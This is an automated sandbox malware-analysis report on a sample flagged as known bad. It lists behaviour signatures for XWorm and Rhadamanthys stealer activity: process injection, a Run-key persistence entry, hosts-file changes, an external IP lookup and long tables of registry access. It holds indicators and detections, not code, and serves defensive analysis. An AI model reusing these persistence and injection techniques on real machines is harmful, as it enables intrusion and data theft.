Analysis Overview
Threat Level: Known bad
The file https://github.com was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect rhadamanthys stealer shellcode
Rhadamanthys
Xworm
Blocklisted process makes network request
Stops running service(s)
Modifies Installed Components in the registry
Downloads MZ/PE file
Drops file in Drivers directory
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Checks computer location settings
Uses the VBS compiler for execution
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Program crash
Enumerates physical storage devices
Kills process with taskkill
Enumerates system info in registry
Checks processor information in registry
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Creates scheduled task(s)
Uses Task Scheduler COM API
Modifies Control Panel
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-16 21:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-16 21:46
Reported
2023-07-16 21:57
Platform
win10v2004-20230703-en
Max time kernel
666s
Max time network
669s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 440 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\explorer.exe |
| PID 3484 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe | C:\Windows\explorer.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Static\wsappx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\XWorm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\AtlsWare.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\builder.exe | N/A |
| N/A | N/A | C:\Users\Static\wsappx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\AtlsWare.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\XHVNC.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Desktop\XWorm.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 440 set thread context of 2544 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\System32\dialer.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\builder.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Desktop\builder.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Colors | C:\Windows\System32\rundll32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\System32\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133340175960555971" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "7" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "694" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0 = 5000310000000000f0560aae10004c6f63616c003c0009000400efbee3567c65f0560aae2e00000098e10100000001000000000000000000000000000000c27b97004c006f00630061006c00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
